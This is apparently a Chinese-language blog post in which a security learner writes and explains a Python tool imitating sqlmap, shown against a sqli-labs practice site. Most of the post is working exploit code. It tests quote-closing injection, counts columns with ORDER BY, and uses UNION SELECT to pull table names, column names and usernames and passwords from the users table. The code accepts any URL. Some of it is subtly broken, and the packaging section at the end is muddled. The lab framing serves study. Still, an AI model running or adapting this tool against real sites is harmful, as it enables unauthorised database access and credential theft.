前景提要
學習網絡安全有一段時間了,用慣了其他人編寫的工具,決心自己寫一個入門級別比較簡單的小工具自己使用練習。
運行演示
- 進入一個 sqli-lab 的靶場當作測試網站。
2.獲取其 url 地址:https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1
3.運行程序
代碼解析
- 首先檢測網站是否存在 sql 注入,通過閉合單雙引號以及布爾判斷檢測
def can_inject(text_url):
text_list = ["%27","%22"]
for item in text_list:
target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
result1 = send_request(target_url1)
result2 = send_request(target_url2)
soup1 = BeautifulSoup(result1,'html.parser')
fonts1 = soup1.find_all('font')
content1 = str(fonts1[2].text)
soup2 = BeautifulSoup(result2,'html.parser')
fonts2 = soup2.find_all('font')
content2 = str(fonts2[2].text)
if content1.find('Login') != -1 and content2 is None or content2.strip() is '':
log('使用' + item + "發現數據庫漏洞")
return True,item
else:log('使用' + item + "未發現數據庫漏洞")
return False,None
123456789101112131415161718
- 如果檢測出存在 sql 注入漏洞的話,通過 order by 檢測字段列數
def text_order_by(url,symbol):
flag = 0
for i in range(1,100):
log('正在查找字段' + str(i))
text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
if content.find('Login') == -1:
log('獲取字段成功 -> ' + str(i) + "個字段")
flag = i
break
return flag
1234567891011121314
- 拿到每個字段后根據 union_select 聯合查詢檢測可視化位置和字段位置
def text_union_select(url,symbol,flag):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
for i in range(1,flag):
if i == flag - 1:text_url += str(i) + "%20--+"
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
for i in range(1,flag):
if content.find(str(i)) != -1:
temp_list = content.split(str(i))
return i,temp_list
1234567891011121314
- 通過訪問網頁找到網頁內容獲取數據庫名
def get_database(url,symbol):
text_url = url + symbol + "aaaaaaaaa"
result = send_request(text_url)
if result.find('MySQL') != -1:return "MySQL"
elif result.find('Oracle') != -1:return "Oracle"
12345
- 獲取數據表名
def get_tables(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(table_name)" + ","
elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
123456789101112
- 獲取字段名
def get_columns(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(column_name)" + ","
elif i == flag - 1:
text_url += str(i) + "%20from%20information_schema.columns%20where%20"
"table_name='users'%20and%20table_schema=database()%20--+"
else:text_url += str(i) + ','
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
1234567891011121314
- 獲取字段內容
def get_data(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
elif i == flag - 1:text_url += str(i) + '%20from%20users%20--+'
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
123456789101112
- 得到每個字段后,循環遍歷出字段中的內容在輸出位置顯示
datas = get_data(url, symbol, flag, index, temp_list).split(',')
temp = columns.split(',')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
for data in datas:
temp = data.split(':')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
123456
完整代碼
### imitate_sqlmap.py
import time,requests
from bs4 import BeautifulSoup
def log(content):
this_time = time.strftime('%H:%M:%S',time.localtime(time.time()))
print("["+str(this_time)+"]" + content)
def send_request(url):
res = requests.get(url)
result = str(res.text)
return result
def can_inject(text_url):
text_list = ["%27","%22"]
for item in text_list:
target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
result1 = send_request(target_url1)
result2 = send_request(target_url2)
soup1 = BeautifulSoup(result1,'html.parser')
fonts1 = soup1.find_all('font')
content1 = str(fonts1[2].text)
soup2 = BeautifulSoup(result2,'html.parser')
fonts2 = soup2.find_all('font')
content2 = str(fonts2[2].text)
if content1.find('Login') != -1 and content2 is None or content2.strip() is '':
log('使用' + item + "發現數據庫漏洞")
return True,item
else:log('使用' + item + "未發現數據庫漏洞")
return False,None
def text_order_by(url,symbol):
flag = 0
for i in range(1,100):
log('正在查找字段' + str(i))
text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
if content.find('Login') == -1:
log('獲取字段成功 -> ' + str(i) + "個字段")
flag = i
break
return flag
def get_prefix_url(url):
splits = url.split('=')
splits.remove(splits[-1])
prefix_url = ''
for item in splits:
prefix_url += str(item)
return prefix_url
def text_union_select(url,symbol,flag):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
for i in range(1,flag):
if i == flag - 1:text_url += str(i) + "%20--+"
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
for i in range(1,flag):
if content.find(str(i)) != -1:
temp_list = content.split(str(i))
return i,temp_list
def exec_function(url,symbol,flag,index,temp_list,function):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += function + ","
elif i == flag - 1:text_url += str(i) + "%20--+"
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
def get_database(url,symbol):
text_url = url + symbol + "aaaaaaaaa"
result = send_request(text_url)
if result.find('MySQL') != -1:return "MySQL"
elif result.find('Oracle') != -1:return "Oracle"
def get_tables(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(table_name)" + ","
elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
def get_columns(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(column_name)" + ","
elif i == flag - 1:
text_url += str(i) + "%20from%20information_schema.columns%20where%20"
"table_name='users'%20and%20table_schema=database()%20--+"
else:text_url += str(i) + ','
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
def get_data(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + "=0" +symbol + "%20union%20select%20"
for i in range(1,flag):
if i == index:text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
elif i == flag - 1:text_url += str(i) + '%20from%20users%20--+'
else:text_url += str(i) + ","
result = send_request(text_url)
soup = BeautifulSoup(result,'html.parser')
fonts = soup.find_all('font')
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
def sqlmap(url):
log('歡迎來到SQL注入工具')
log('正在進行SQL注入')
result,symbol = can_inject(url)
if not result:
log('此網站不存在SQL漏洞,退出SQL注入')
return False
log('此網站存在SQL注入漏洞,請等待')
flag = text_order_by(url,symbol)
index,temp_list = text_union_select(url,symbol,flag)
database = get_database(url,symbol)
version = exec_function(url,symbol,flag,index,temp_list,'version()')
this_database = exec_function(url,symbol,flag,index,temp_list,'database()')
log('當前數據庫 -> '+ database.strip() + version.strip())
log('數據庫名 -> ' + this_database.strip())
tables = get_tables(url,symbol,flag,index,temp_list)
log('數據表名 -> ' + tables.strip())
columns = get_columns(url,symbol,flag,index,temp_list)
log('數據列 -> ' + columns .strip())
log('試圖得到全部列...')
datas = get_data(url, symbol, flag, index, temp_list).split(',')
temp = columns.split(',')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
for data in datas:
temp = data.split(':')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156
PyPi打包為可執行文件
在 cfg 文件中添加 entry_points 參數即可。entry_points參數為一個imitate_sqlmap通過setuptools注冊的一個外部可以直接調用的接口。在imitate_sqlmap的setup.py里注冊entry_points如下:
setup(
name='imitate_sqlmap',
entry_points={
'imitate_sqlmap.api.sqlmap':[
'databases=imitate_sqlmap.api.sqlmap.databases:main',
],
)
1234567
該 setup() 函數注冊了一個 entry_point ,屬于 imitate_sqlmap.api.sqlmap.group 。注意,如果多個其它不同的 imitate_sqlmap 利用 imitate_sqlmap.api.sqlmap 來注冊 entry_point ,那么我用 imitate_sqlmap.api.sqlmap 來訪問 entry_point 時,將會獲取所有已注冊過的 entry_point。
